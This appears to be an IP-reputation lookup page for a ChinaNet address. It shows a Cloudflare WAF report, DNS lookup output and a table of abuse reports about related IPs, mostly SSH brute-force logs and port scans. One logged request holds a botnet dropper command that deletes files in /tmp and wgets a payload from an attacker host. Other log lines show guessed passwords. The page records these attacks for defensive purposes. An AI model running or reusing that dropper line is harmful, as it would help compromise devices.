49.66.17.220 - IPInfo

Basic Info

City: unknown

Region: unknown

Country: China

Internet Service Provider: ChinaNet Jiangsu Province Network

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

Type	Details	Datetime
attackspambots	The IP has triggered Cloudflare WAF. CF-Ray: 54139d5ea8a2e794 \| WAF_Rule_ID: 3b40188685924a32bf11d40edea05a27 \| WAF_Kind: firewall \| CF_Action: challenge \| Country: CN \| CF_IPClass: noRecord \| Protocol: HTTP/2 \| Method: GET \| Host: api.skk.moe \| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15 \| CF_DC: LAX. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/SukkaW/Cloudflare-WAF-to-AbuseIPDB).	2019-12-08 05:11:10

Type

Details

Datetime

attackspambots

The IP has triggered Cloudflare WAF. CF-Ray: 54139d5ea8a2e794 | WAF_Rule_ID: 3b40188685924a32bf11d40edea05a27 | WAF_Kind: firewall | CF_Action: challenge | Country: CN | CF_IPClass: noRecord | Protocol: HTTP/2 | Method: GET | Host: api.skk.moe | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15 | CF_DC: LAX. Report generated by Cloudflare-WAF-to-AbuseIPDB (https://github.com/SukkaW/Cloudflare-WAF-to-AbuseIPDB).

2019-12-08 05:11:10

Comments on same subnet:

IP	Type	Details	Datetime
49.66.177.177	attackspam	Port scan on 1 port(s): 15198	2020-05-12 06:54:37

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 49.66.17.220
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 2254
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;49.66.17.220.			IN	A

;; AUTHORITY SECTION:
.			408	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019120701 1800 900 604800 86400

;; Query time: 116 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Sun Dec 08 05:11:07 CST 2019
;; MSG SIZE  rcvd: 116

Host info

Host 220.17.66.49.in-addr.arpa. not found: 3(NXDOMAIN)

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 220.17.66.49.in-addr.arpa: NXDOMAIN

Related IP info:

Related comments:

IP	Type	Details	Datetime
140.143.187.21	attackbotsspam	Lines containing failures of 140.143.187.21 Oct 5 05:52:52 jarvis sshd[3257]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.187.21 user=r.r Oct 5 05:52:54 jarvis sshd[3257]: Failed password for r.r from 140.143.187.21 port 49314 ssh2 Oct 5 05:52:56 jarvis sshd[3257]: Received disconnect from 140.143.187.21 port 49314:11: Bye Bye [preauth] Oct 5 05:52:56 jarvis sshd[3257]: Disconnected from authenticating user r.r 140.143.187.21 port 49314 [preauth] Oct 5 06:13:33 jarvis sshd[4305]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.187.21 user=r.r Oct 5 06:13:35 jarvis sshd[4305]: Failed password for r.r from 140.143.187.21 port 49000 ssh2 Oct 5 06:13:37 jarvis sshd[4305]: Received disconnect from 140.143.187.21 port 49000:11: Bye Bye [preauth] Oct 5 06:13:37 jarvis sshd[4305]: Disconnected from authenticating user r.r 140.143.187.21 port 49000 [preauth] Oct 5 06:18:........ ------------------------------	2020-10-07 18:15:35
189.125.93.48	attackspambots	189.125.93.48 (BR/Brazil/-), 6 distributed sshd attacks on account [root] in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_DISTATTACK; Logs: Oct 7 02:24:38 server5 sshd[17215]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=189.125.93.48 user=root Oct 7 02:24:40 server5 sshd[17215]: Failed password for root from 189.125.93.48 port 50606 ssh2 Oct 7 02:24:28 server5 sshd[16963]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=64.227.0.92 user=root Oct 7 02:24:30 server5 sshd[16963]: Failed password for root from 64.227.0.92 port 35944 ssh2 Oct 7 02:24:19 server5 sshd[16854]: Failed password for root from 220.132.75.140 port 52846 ssh2 Oct 7 02:25:30 server5 sshd[17373]: Failed password for root from 45.55.182.232 port 53090 ssh2 IP Addresses Blocked:	2020-10-07 18:44:30
203.109.82.44	attack	Oct 7 11:52:03 server sshd[6940]: Failed password for root from 203.109.82.44 port 46932 ssh2 Oct 7 11:57:01 server sshd[8197]: Failed password for root from 203.109.82.44 port 56052 ssh2 Oct 7 12:02:06 server sshd[9299]: Failed password for root from 203.109.82.44 port 36988 ssh2	2020-10-07 18:40:35
220.186.149.82	attack	Banned for a week because repeated abuses, for example SSH, but not only	2020-10-07 18:34:19
106.75.217.16	attackbotsspam	Attempted connection to port 4243.	2020-10-07 18:16:49
123.8.250.193	attackspambots	GET /shell?cd+/tmp;rm+-rf+*;wget+http://123.8.250.193:51862/Moz	2020-10-07 18:29:24
114.204.218.154	attack	Oct 7 12:00:34 PorscheCustomer sshd[26419]: Failed password for root from 114.204.218.154 port 45305 ssh2 Oct 7 12:04:32 PorscheCustomer sshd[26554]: Failed password for root from 114.204.218.154 port 47290 ssh2 ...	2020-10-07 18:17:48
112.85.42.172	attackbotsspam	Oct 7 12:25:17 melroy-server sshd[27529]: Failed password for root from 112.85.42.172 port 37134 ssh2 Oct 7 12:25:21 melroy-server sshd[27529]: Failed password for root from 112.85.42.172 port 37134 ssh2 ...	2020-10-07 18:25:47
63.41.9.207	attack	Oct 6 22:30:44 s2 sshd[29082]: Failed password for root from 63.41.9.207 port 35822 ssh2 Oct 6 22:38:21 s2 sshd[29500]: Failed password for root from 63.41.9.207 port 54629 ssh2	2020-10-07 18:46:34
112.85.42.112	attack	Oct 7 12:32:38 nopemail auth.info sshd[20416]: Unable to negotiate with 112.85.42.112 port 37368: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1 [preauth] ...	2020-10-07 18:39:40
109.228.37.115	attackbotsspam	Brute forcing email accounts	2020-10-07 18:11:50
66.49.131.65	attackspam	2020-10-06 UTC: (41x) - root(41x)	2020-10-07 18:20:13
157.245.163.0	attackspam	TCP port : 26894	2020-10-07 18:36:18
117.35.118.42	attackspam	2020-10-07T06:56:57.949935mail.standpoint.com.ua sshd[15707]: Invalid user #Edcxsw2 from 117.35.118.42 port 58226 2020-10-07T06:56:57.954043mail.standpoint.com.ua sshd[15707]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=117.35.118.42 2020-10-07T06:56:57.949935mail.standpoint.com.ua sshd[15707]: Invalid user #Edcxsw2 from 117.35.118.42 port 58226 2020-10-07T06:56:59.931322mail.standpoint.com.ua sshd[15707]: Failed password for invalid user #Edcxsw2 from 117.35.118.42 port 58226 ssh2 2020-10-07T06:59:31.629198mail.standpoint.com.ua sshd[16044]: Invalid user !QAZ2wsx#EDC4rfv from 117.35.118.42 port 37996 ...	2020-10-07 18:08:37
218.108.186.218	attackbots	SSH invalid-user multiple login try	2020-10-07 18:20:29

Recently Reported IPs

163.58.198.74	113.128.105.108	112.112.86.151	111.224.7.217
110.80.155.45	110.80.153.35	106.45.1.16	65.49.71.79
61.157.144.188	60.219.149.31	51.143.169.176	47.244.4.65
39.130.61.156	36.110.171.30	36.32.3.125	34.92.224.35
27.224.137.102	223.166.75.179	223.166.75.43	222.94.195.19